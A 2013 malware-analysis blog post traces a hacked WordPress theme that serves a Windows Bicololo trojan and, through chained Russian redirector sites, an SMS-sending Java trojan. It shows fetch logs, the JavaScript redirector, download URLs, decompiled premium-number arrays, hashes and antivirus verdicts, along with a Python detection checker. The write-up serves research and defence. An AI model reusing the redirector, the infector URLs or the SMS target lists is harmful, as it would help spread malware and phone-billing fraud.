Friday, January 11, 2013

A double hit - PC Trojan W32/VBS Bicololo and Mobile Java Android/Trojan SMS Apps via a hacked Wordpress site

WordPress is a very useful blogging platform: it has many useful features in its themes & plugins and worldwide popularity, yet it is also famous for the tons of vulnerabilities in the plugins and themes it supports. This story is about a WordPress site that got hacked and was used to serve malware infections, not only to the PCs that accessed it, but also malware for mobile devices too.
Here we go!
Recognizing the infection pattern reported in UrlQuery below:
http://urlquery.net/report.php?id=678590
led us to a large number (hundreds) of malware infector URLs on inbuildhouse.ru, all hitting the same akismeet.php script with a random ncrnd parameter:
These URLs come from a vulnerable WordPress install with the theme "Stroy/Red Stroy" injected: the malware download is served by a fake "akismeet.php" script with a randomly generated query string. I think the theme was made in Russia.

The PC Threat

In short, we fetched the sample:
Resolving inbuildhouse.ru... seconds 0.00, 178.236.176.74
Caching inbuildhouse.ru => 178.236.176.74
Connecting to inbuildhouse.ru|178.236.176.74|:80... seconds 0.00, connected.
  :
GET /wp-content/themes/stroy/akismeet.php?ncrnd=hQwgNcBXro HTTP/1.0
Accept: */*
Host: inbuildhouse.ru
Connection: Keep-Alive
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 302 Found
Server: nginx/1.1.5
Date: Fri, 11 Jan 2013 11:46:02 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Location: h00p://inbuildhouse.ru/wp-content/themes/stroy/update.php?q=PHOTO-DEVOCHKA
  :
302 Found
Location: h00p://inbuildhouse.ru/wp-content/themes/stroy/update.php?q=PHOTO-DEVOCHKA [following]
Skipping 0 bytes of body: [] done.
--20:46:10--  h00p://inbuildhouse.ru/wp-content/themes/stroy/update.php?q=PHOTO-DEVOCHKA
           => `update.php@q=PHOTO-DEVOCHKA'
Reusing existing connection to inbuildhouse.ru:80.
  :
GET /wp-content/themes/stroy/update.php?q=PHOTO-DEVOCHKA HTTP/1.0
Accept: */*
Host: inbuildhouse.ru
Connection: Keep-Alive
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.1.5
Date: Fri, 11 Jan 2013 11:46:03 GMT
Content-Type: application/octet-stream
Content-Length: 184243
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Accept-Ranges: bytes
Content-disposition: attachment; filename="PHOTO-DEVOCHKA.exe"
  :
200 OK
Length: 184,243 (180K) [application/octet-stream]
20:46:13 (78.58 KB/s) - `PHOTO-DEVOCHKA.exe' saved [184243/184243]
We got the sample, which turned out to be the Trojan VBS Win32/Bicololo. Below is the VirusTotal scan result:
SHA1: f05b0a6734391f19838bdcb41d29d173a1d45b02
MD5: f54715875c3327953965072927e86bd0
File size: 179.9 KB ( 184243 bytes )
File name: GOLAYA-BABE.exe
File type: Win32 EXE
Tags: peexe bobsoft
Detection ratio: 11 / 44
Analysis date: 2013-01-11 12:51:39 UTC ( 5 minutes ago )
URL --->>[VirusTotal]
Malware Names:
GData : VBS:Bicololo-BG
TrendMicro-HouseCall : TROJ_GEN.F47V0111
Avast : VBS:Bicololo-BG [Trj]
Kaspersky : UDS:DangerousObject.Multi.Generic
Jiangmin : Trojan/StartPage.bim
Malwarebytes : Trojan.StartPage.ooo
Panda : Trj/Qhost.MR
Ikarus : Trojan.Win32.Qhosts
Kingsoft : Win32.Troj.Undef.(kcloud)
TheHacker : Trojan/Bicololo.a
Microsoft : Trojan:Win32/QHosts.BF
VirusTotal & ESET made a good description and analysis of this trojan. Our analysis result-->>[HERE] (matched to the ESET Bicololo Trojan description). Below is the network traffic we captured.

The Mobile Threat

The story does not end there; the hacked site was filled with other infectors. We accidentally found this link:
inbuildhouse.ru/wp-content/themes/stroy/
Then we followed it...
=> `inbuildhouse.ru/wp-content/themes/stroy/index.html'
Resolving inbuildhouse.ru... 178.236.176.74
Connecting to inbuildhouse.ru|178.236.176.74|:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: h00p://mampoks.ru [following]
--20:59:13--  h00p://mampoks.ru/
           => `mampoks.ru/index.html'
Resolving mampoks.ru... 195.128.18.244
Connecting to mampoks.ru|195.128.18.244|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 369 [text/html]
20:59:13 (11.45 MB/s) - `mampoks.ru/index.html' saved [369/369]
and we were forwarded to ANOTHER infector (mampoks.ru). We got that infector's index.html instead, which contains a redirector script to ANOTHER HOST's landing page at ktozdesj.ru↓
<script language="JavaScript1.1" type="text/javascript">
<!--
location.replace("h00p://ktozdesj.ru/l.php?l=o&r=9578&a=32");
//-->
</script>
<noscript>
<meta http-equiv="Refresh" content="0; URL=h00p://ktozdesj.ru/l.php?l=o&r=9578&a=32">
</noscript>
Your browser will download:
Resolving ktozdesj.ru... seconds 0.00, 93.170.107.130
Caching ktozdesj.ru => 93.170.107.130
Connecting to ktozdesj.ru|93.170.107.130|:80... seconds 0.00, connected.
GET /l.php?l=o&r=9578&a=32 HTTP/1.0
Referer: h00p://inbuildhouse.ru/wp-content/themes/stroy/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: ktozdesj.ru
Connection: Keep-Alive
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx admin
Date: Fri, 11 Jan 2013 12:01:13 GMT
Content-Type: text/html
Content-Length: 5307
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=cbd9f50b900881ae84c2ecfa6cb65889; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=cbd9f50b900881ae84c2ecfa6cb65889; expires=Fri, 11-Jan-2013 13:01:13 GMT; path=/; domain=.localhost
200 OK
Length: 5,307 (5.2K) [text/html]
21:01:21 (105.95 MB/s) - `l.php' saved [5307/5307]
Which contains the malicious link below:
ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32
PoC:
$ grep "getfile" 1.php

l.php(24):  <a href="h00p..ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32"><img src="landings/images/opera/images/mobile-logo.png" alt="Обновление Opera Mini"></a>
l.php(35):  <a href="h00p..ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32" class="tab-link">
l.php(66):  <form action="h00p..ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32" method="post" class="close">
l.php(80):  <p id="add-source"><a href="h00p..ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32" class="button">Скачать версию 7.0</a></p>
l.php(84):  <a class="art-opn" href="h00p..ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32" title="Обнови свою Opera!" target="_blank">
l.php(139): <p id="add-source"><a href="h00p..ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32" class="button">Скачать версию 7.0</a></p>
If your browser is a mobile/Android one, you will be redirected to this URL↑ And where does it lead us?
HTTP/1.1 200 OK
Server: nginx admin
Date: Fri, 11 Jan 2013 12:14:09 GMT
Content-Type: application/java-archive
Content-Length: 251481
Connection: close
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=4db23831b11474b4f734f1ae64594967; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=4db23831b11474b4f734f1ae64594967; expires=Fri, 11-Jan-2013 13:14:09 GMT; path=/; domain=.localhost
Content-Disposition: attachment; filename="browser_update_install.jar"
Yes, another JAR payload, "browser_update_install.jar".
File Info:
browser_update_install.jar 2013/01/11 21:16 251,481 45078333eb39116c154899d3bf5501e8
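As an added example (not code from the original post), here is a small Python checker that turns the two delivery patterns documented above, the theme-script 302 chain serving PHOTO-DEVOCHKA.exe and the getfile.php endpoint serving browser_update_install.jar, into rules that can be run over parsed proxy or IDS records; the transaction records and the rules are my own construction modelled on the captured headers.

```python
import re
from urllib.parse import urlsplit

# Constructed transactions modelled on the captured sessions in this post
# (request path, status, the response headers that matter). Not real logs.
TRANSACTIONS = [
    {"host": "inbuildhouse.ru", "status": 302, "content_type": "text/html",
     "path": "/wp-content/themes/stroy/akismeet.php?ncrnd=hQwgNcBXro", "disposition": None,
     "location": "http://inbuildhouse.ru/wp-content/themes/stroy/update.php?q=PHOTO-DEVOCHKA"},
    {"host": "inbuildhouse.ru", "status": 200, "content_type": "application/octet-stream",
     "path": "/wp-content/themes/stroy/update.php?q=PHOTO-DEVOCHKA", "location": None,
     "disposition": 'attachment; filename="PHOTO-DEVOCHKA.exe"'},
    {"host": "ktozdesj.ru", "status": 200, "content_type": "application/java-archive",
     "path": "/getfile.php?dtype=browser&r=9578-1&a=32", "location": None,
     "disposition": 'attachment; filename="browser_update_install.jar"'},
    # A benign theme asset, to show the rules stay quiet on normal traffic.
    {"host": "example.org", "status": 200, "content_type": "text/css",
     "path": "/wp-content/themes/twentytwelve/style.css", "location": None, "disposition": None},
]

# A PHP file called directly inside a theme directory: themes normally run
# through WordPress, not as standalone endpoints with their own query strings.
THEME_SCRIPT = re.compile(r"^/wp-content/themes/[^/]+/[^/]+\.php$")
BINARY_TYPES = {"application/octet-stream", "application/java-archive", "application/x-msdownload"}
PAYLOAD_EXT = (".exe", ".jar", ".scr")

def attachment_name(disposition):
    """Extract the filename from a Content-Disposition header, or None."""
    if not disposition:
        return None
    m = re.search(r'filename="?([^";]+)"?', disposition)
    return m.group(1) if m else None

def suspicious(tx):
    """Return the reasons one transaction matches the infector pattern (empty if none)."""
    reasons = []
    req_path = urlsplit(tx["path"]).path
    from_theme = bool(THEME_SCRIPT.match(req_path))
    # Rule 1: a theme PHP script that only bounces to another theme PHP script.
    if from_theme and tx["status"] in (301, 302) and tx["location"]:
        if THEME_SCRIPT.match(urlsplit(tx["location"]).path):
            reasons.append("theme script redirects to another theme script")
    # Rule 2: a PHP endpoint pushing a binary download with an executable filename.
    name = attachment_name(tx["disposition"])
    if name and name.lower().endswith(PAYLOAD_EXT) and req_path.endswith(".php"):
        if tx["content_type"] in BINARY_TYPES:
            reasons.append("PHP endpoint serves %s as %s" % (name, tx["content_type"]))
        if from_theme:
            reasons.append("payload served from inside a theme directory")
    return reasons

def scan(transactions):
    """Map each flagged host+path to its reasons; feed it parsed proxy records."""
    hits = {}
    for tx in transactions:
        reasons = suspicious(tx)
        if reasons:
            hits[tx["host"] + tx["path"]] = reasons
    return hits
```

Running scan(TRANSACTIONS) flags the three malicious records and leaves the benign style.css request alone.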
We analyzed the code to find the malicious SMS-sending functions-->>[HERE]. Yes, it sends SMS to specific numbers, with support for international country codes. Some of the numbers it reaches...
public final class k
{ private static String[] a = { "79202909090", "79206909090", "79219909090", "79222909090", "79232909090", "79242000690", "79262909090", "79272909090", "79282000002", "79289900028", "89282000002" };
  private static String[] b = { "79168999100", "79168960220", "79116009993", "79114009993", "73434800248", "79147991000", "79147991000", "79106609999", "79135330003", "79168999800", "79139869990", "79107459999", "79171002003", "79171002003", "79112009993", "70957699100", "70957699101", "70957699102", "70957699800", "79027899999", "79029889991", "79104999104", "79107899999", "79126313456", "79128800003", "79128900003", "79129200003", "79168999101", "79168999102" };
  private static String[] c = { "7922", "7929", "7932" };
   :
   :
static
 {{ "79037011111", "73339077000", "77059077000", "790173100", "79033619502" }[5] = "79037011110";
  { "7901630", "7901631", "7901632", "7901633", "79016340", "79016341", "79016342", "79016343", "79016344", "7901640", "7901641", "790165", "790166", "7901670", "7901671", "7901672", "7901673", "7901674", "790217", "7902510", "7902511", "7902512", "7902513", "7902514", "7902515", "7902516", "7902519", "790254", "7902560", "7902561", "7902566", "7902567", "7902568", "7902569", "7902576", "7902577", "7902578", "7902579", "790276", "790411", "790412", "790413", "790414", "790415", "790864", "790865", "790866", "795005", "795006", "795007", "795008", "795009", "795010", "795011", "795012", "795013", "795014", "795261", "795262" }[59] = "795263";
    d = new String[] { "7701", "7702", "7775", "7778", "73009300300", "73009300301" };
    e = new String[] { "7908228", "7908229", "795297", "795298", "790219", "7902285", "7902286", "7902504", "7902507", "795025", "7950660", "7950661", "7950962", "7950963", "795225", "795230", "795326", "795393", "790408", "790409", "790453", "790878", "795071", "795113", "795114", "795115", "795176", "795242", "795243", "7900355", "7900356", "7900357", "7900358", "7900359", "790036", "7900370", "7900371", "7900372", "7900373", "7900374", "795069", "795296", "795327", "795328", "795329", "7902147", "7902148", "7902149", "7902283", "7902284", "7908225", "7908226", "7908291", "7908292", "7908293", "7908294", "7908295", "795068", "795172", "795248", "795390", "79004735", "79004736", "79004737", "79004738", "79004739", "7900474", "7900475", "7900476", "7900477", "7900478", "7900479", "7900480", "7900481", "7900482", "79004830", "79004831", "79004832", "79004833", "79004834", "790403", "790425", "7904260", "7904261", "790459", "790465", "7904857", "7904858", "7904859", "7904955", "7904956", "7904957", "7904958", "7904959", "795173", "795174", "795350", "795351", "7953520", "7953521", "7953522", "7953523", "7953524", "7900300", "7900301", "7900302", "7900303", "7900304", "7900305", "7900306", "7900307", "7900308", "7900309", "7904210", "7904211", "7904212", "7904213", "7904214", "790813", "790814", "795075", "795076", "795077", "795154", "795155", "795156", "795185", "795186", "795187", "795210", "795254", "795255", "7904245", "7904246", "7904247", "7904248", "7904249", "7904275", "7904276", "7904277", "7904278", "7904279", "790431", "790483", "795015", "795016", "795017", "795081", "795082", "795083", "795119", "795120", "795121", "795240", "795241", "79534115", "79534116", "79534117", "79534118", "79534119", "7900345", "7900346", "7900347", "7900348", "7900349", "7900350", "7900351", "7900352", "7900353", "7900354", "7902250", "7902251", "7902252", "7908290", "795067", "795205", "795211", "795279", "795331", "795332", "795333", "795346", "790437", "790457", "790496", 
"790499", "790894", "790895", "795026", "795027", "795057", "795058", "795059", "795116", "795117", "795118", "795157", "795158", "795159", "795160", "795161", "7952165", "7952166", "7952167", "7952168", "7952169", "7952170", "7952171", "7952172", "7952173", "7952174", "7953059", "7953060", "7953061", "7953062", "7953063", "7953064", "7953065", "7953066", "7953067", "7953068", "790052", "7951347", "7951348", "7951349", "7951350", "7951351", "7951352", "7951353", "7951354", "7951355", "7951356", "795313", "795367", "795368", "795369", "795394", "795024", "795364", "795365", "795366", "7900229", "790023", "790024", "790025", "790026", "790027", "790028", "7900290", "7900291", "7900292", "7900293", "7900294", "7900295", "7900296", "7900297", "7900298", "7902403", "7902404", "7902405", "7902406", "7902407", "7902408", "790867", "790868", "7908690", "7908691", "7908692", "7908693", "795281", "795282", "795283", "795284", "795285", "795286", "795287", "7953069", "795307", "795308", "795309", "795310", "7953110", "7953111", "7953112", "7953113", "7953114", "7953115", "7953116", "7953117", "7953118", "79534110", "79534111", "79534112", "79534113", "79534114", "790452", "790812", "795087", "795107", "795108", "795131", "795132", "795133", "795249", "7904218", "7904219", "790428", "790429", "790468", "790469", "795080", "795130", "795259", "790213", "7902281", "7902282", "7908605", "7908606", "7908607", "795089", "7951295", "7951296", "7951297", "795229", "795330", "795375", "7952314", "790404", "790405", "790406", "790439", "790815", "790816", "790823", "795060", "795061", "795062", "795244", "795245", "795276", "795277", "795278", "795355", "795356", "795357", "795136", "795137", "795138", "795139", "795290", "795291", "795292", "795293", "795294", "795376", "795377", "795378", "795379", "795380", "7953857", "7953858", "7953859", "795386", "795387", "795388", "7953890", "7953891", "7953892", "7953893", "7953894", "7953895", "7953896", "790407", "790432", "790458", 
"790482", "790810", "790811", "790831", "790879", "790880", "795021", "795033", "795078", "795079", "795095", "795140", "795141", "795142", "795339", "795347", "795361", "795362", "795381", "7900455", "7900456", "7900457", "7900458", "7900459", "7900460", "7900461", "7900462", "7900463", "7900464", "7953525", "7953526", "7953527", "7953528", "7953529", "795353", "795354", "795175", "795323", "795324", "7953250", "7953251", "7953252", "7953253", "7953254", "790434", "790444", "790450", "790817", "790818", "790819", "790850", "790851", "795084", "795085", "795086", "795149", "795150", "795151", "795152", "795153", "795182", "795183", "795184", "795256", "795257", "795258", "795260", "795110", "795212", "795373", "795374", "790433", "790451", "790455", "790460", "790461", "790463", "790464", "795000", "795001", "795002", "795003", "795004", "795022", "795164", "795165", "795166", "795167", "795168", "795220", "795221", "795222", "795223", "795224", "795226", "795227", "795228", "795235", "795236", "795237", "795238", "795239", "795314", "795315", "795316", "795317", "795334", "795335", "795336", "795337", "7900219", "7900220", "7900221", "7900222", "7900223", "7900224", "7900225", "7900226", "7900227", "7900228", "790436", "790828", "795070", "795169", "795170", "795171", "795253", "795299", "790410", "790420", "790422", "790423", "7904270", "7904271", "7904272", "7904273", "7904274", "790486", "7908328", "7908329", "7908715", "7908716", "7908717", "7908718", "7908719", "7950308", "7950565", "7950566", "7950567", "7950568", "7950569", "795312", "795370", "795371", "795372", "79004715", "79004716", "79004717", "79004718", "79004719", "7900472", "79004730", "79004731", "79004732", "79004733", "79004734", "790400", "790401", "790402", "790435", "795206", "795215", "7952160", "7952161", "7952162", "7952163", "7952164", "7952175", "7952176", "7952177", "7952178", "7952179", "7952180", "7952181", "7952182", "7952183", "7952184", "795280", "795288", "795289", "795391", 
"795392", "795090", "795091", "795092", "7952015", "7952016", "7952017", "7952018", "7952019", "7952185", "7952186", "7952187", "7952188", "7952189", "795318", "795319", "7953419", "795342", "795343", "7953440", "7953441", "7953442", "7953443", "795395", "795396", "7953970", "7953971", "7953972", "7953973", "7953974", "790430", "790497", "790804", "790805", "790806", "790857", "790858", "795072", "795073", "795074", "795111", "795112", "795144", "795145", "795146", "795147", "795148", "795177", "795178", "795179", "795180", "795181", "795250", "795251", "795252" };
    { "38050", "38095", "38066" }[3] = "38099";
    { "790208", "7902200", "7902203", "7902204", "7902205", "7902206", "7902207", "7902208", "7902209", "790234", "7902352", "7902353", "7902354", "79047299", "790852", "790853" }[16] = "795023";
    f = new String[] { "7705", "7777", "7771" };  }}
Some country codes...
jdField_a_of_type_JavaUtilHashtable.put("7840", "ab");
jdField_a_of_type_JavaUtilHashtable.put("7940", "ab");
jdField_b_of_type_JavaUtilHashtable.put("994", "az");
jdField_b_of_type_JavaUtilHashtable.put("213", "alzhir");
jdField_b_of_type_JavaUtilHashtable.put("374", "am");
jdField_b_of_type_JavaUtilHashtable.put("375", "by");
jdField_b_of_type_JavaUtilHashtable.put("359", "bolgaria");
jdField_b_of_type_JavaUtilHashtable.put("387", "bosniaigerc");
jdField_b_of_type_JavaUtilHashtable.put("502", "gvatemala");
jdField_b_of_type_JavaUtilHashtable.put("504", "gonduras");
jdField_b_of_type_JavaUtilHashtable.put("852", "gonkong");
jdField_b_of_type_JavaUtilHashtable.put("972", "israel");
jdField_b_of_type_JavaUtilHashtable.put("962", "iordania");
jdField_b_of_type_JavaUtilHashtable.put("855", "kambodzha");
The VirusTotal check shows:
MD5: 45078333eb39116c154899d3bf5501e8
File size: 245.6 KB ( 251481 bytes )
File name: browser_update_install.jar
File type: JAR
Tags: jar
Detection ratio: 31 / 46
Analysis date: 2013-01-11 12:17:18 UTC ( 1 hour, 58 minutes ago )
URL --->>[VirusTotal]
Malware Names:
MicroWorld-eScan : Trojan.Java.Smssend.W
nProtect : Trojan.Java.Smssend.W
CAT-QuickHeal : Trojan.JavaExploit
McAfee : Generic.dx!bfzk
K7AntiVirus : Trojan
F-Prot : Java/SMSer.L
Symantec : Trojan.Gen.2
Norman : SMSSend.CX
TotalDefense : Java/SMSTroj.Q
TrendMicro-HouseCall : TROJ_GEN.FCBHZIK
Avast : Java:SMSSend-GF [Expl]
ClamAV : Android.Trojan.Smssend-7
Kaspersky : Trojan-SMS.J2ME.Jifake.my
BitDefender : Trojan.Java.Smssend.W
NANO-Antivirus : Trojan.SmsSend.wgugf
Sophos : Troj/Jifake-A
Comodo : UnclassifiedMalware
F-Secure : Trojan.Java.Smssend.W
DrWeb : Java.SMSSend.780
AntiVir : JAVA/Badorg.BA
TrendMicro : JAVA_SMSAGE.NT
Emsisoft : Trojan.Java.Smssend.W (B)
Jiangmin : Trojan/AndroidOS.afcr
Microsoft : Trojan:Java/SMSer.AY
ViRobot : J2ME.A.Jifake.2840
GData : Trojan.Java.Smssend.W
Commtouch : Java/SMSer.L
ESET-NOD32 : a variant of J2ME/TrojanSMS.Agent.DH
Ikarus : JAVA.SMSSend
Fortinet : Java/SMSBoxer.AQ!tr
AVG : Java/SMS.OO

Research Materials

To fellow researchers & the AV industry: samples & analysis data are-->>[HERE]
#MalwareMustDie